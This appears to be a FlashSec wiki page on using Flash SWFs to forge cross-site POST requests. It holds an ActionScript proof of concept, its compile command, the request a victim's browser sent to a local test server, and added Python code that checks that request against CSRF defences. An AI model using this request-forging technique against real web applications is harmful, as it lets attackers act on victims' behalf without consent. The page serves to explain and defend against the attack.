Arbitrary HTTP Requests

From FlashSec


Flash can be used to send arbitrary HTTP headers to web applications. In attacks it is often used as an easy way to exploit forms that only accept POST requests. With newer versions of the Adobe Flash plugin it is no longer easy to forge the Referer: the URL of the original SWF is sent instead. There are still possibilities, as described by Alex. It is possible to use a construction like req.addRequestHeader("Referer:http://foo/?param=", "bar") to add a custom Referer (but it has some drawbacks). Note: As of Flash Player 9.0.115 this method of adding custom headers like Referer, Cookie etc. no longer works with either AS2- or AS3-based SWFs.

Here's an example written in ActionScript 2:

class forge_headers {
  function forge_headers() {
  }

  // Entry point invoked by MTASC's -main option; mc is the root movie clip.
  static function main(mc) {
    var req:LoadVars = new LoadVars();
    // Custom header; it appears in the request as "Bar: BarFoo".
    req.addRequestHeader("Bar", "BarFoo");
    // Body parameters, sent URL-encoded (their order is not preserved, see the captured request below).
    req.decode("a=b&c=d&e=f");
    req.send("http://127.0.0.1:2342/foo", "", "POST");
  }
}

The ActionScript source can be compiled using MTASC:

mtasc -swf forge_headers.swf -main -header 10:10:10 forge_headers.as

When the resulting SWF is executed in a victim's browser (Safari 3.0.2 in this case), the following request is sent:

POST /foo HTTP/1.1
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://localhost/forge_headers.swf
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Content-Type: application/x-www-form-urlencoded
Bar: BarFoo
Content-Length: 11
Connection: keep-alive
Host: 127.0.0.1:2342

e=f&c=d&a=b
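The captured request makes the defensive point concrete: a "POST only" rule is satisfied trivially, the Referer points at the SWF rather than the application, and the body carries no anti-CSRF token. The following Python is an added example (not code from the FlashSec page) that parses the request above, as received by a server on 127.0.0.1:2342, and evaluates those three checks side by side. The form field name csrf_token, the expected token value and the second "legitimate" request are constructed for the example.

```python
"""Triage of a captured HTTP POST against common anti-CSRF defences.
Added example, not part of the FlashSec page; requests below are constructed."""
from urllib.parse import urlsplit, parse_qs

# Constructed sample: the request produced by forge_headers.swf as shown on the page.
CAPTURED_REQUEST = (
    "POST /foo HTTP/1.1\r\n"
    "Accept-Language: en\r\n"
    "Referer: http://localhost/forge_headers.swf\r\n"
    "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522.11\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Bar: BarFoo\r\n"
    "Content-Length: 11\r\n"
    "Connection: keep-alive\r\n"
    "Host: 127.0.0.1:2342\r\n"
    "\r\n"
    "e=f&c=d&a=b"
)

# Constructed sample: what a submission from the application's own form would look like
# when the form embeds a per-session token (field name csrf_token is an assumption).
LEGITIMATE_REQUEST = (
    "POST /foo HTTP/1.1\r\n"
    "Referer: http://127.0.0.1:2342/form\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: 127.0.0.1:2342\r\n"
    "\r\n"
    "a=b&csrf_token=constructed-token"
)

# Header names a browser normally sends; anything else is worth logging.
BROWSER_HEADERS = {
    "accept", "accept-language", "accept-encoding", "referer", "user-agent",
    "content-type", "content-length", "connection", "host", "cookie", "origin",
}


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Header names are lower-cased; the first ':' separates name from value."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def evaluate_defenses(raw, app_host, expected_token):
    """Run three checks and report each outcome separately so the gap between
    'POST only' and a real token check is visible."""
    method, _path, headers, body = parse_request(raw)
    referer_host = urlsplit(headers.get("referer", "")).netloc
    form = parse_qs(body)
    return {
        "post_only_passed": method == "POST",
        "referer_matches_app": referer_host == app_host,
        "csrf_token_valid": form.get("csrf_token") == [expected_token],
        "unexpected_headers": sorted(h for h in headers if h not in BROWSER_HEADERS),
    }


def should_accept(result):
    """Accept only on a valid token. The Referer comparison is advisory: the header
    may be absent, and (as the page notes) older Flash players could forge it."""
    return result["csrf_token_valid"]


if __name__ == "__main__":
    for label, raw in (("forged", CAPTURED_REQUEST), ("legitimate", LEGITIMATE_REQUEST)):
        verdict = evaluate_defenses(raw, "127.0.0.1:2342", "constructed-token")
        print(label, verdict, "accept" if should_accept(verdict) else "reject")
```

Run stand-alone it prints one line per request: the forged one passes the POST-only check yet fails the Referer and token checks and carries the unexpected Bar header, while the legitimate one is accepted on its token. The unexpected-header list is a detection aid for logs, not an access decision.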
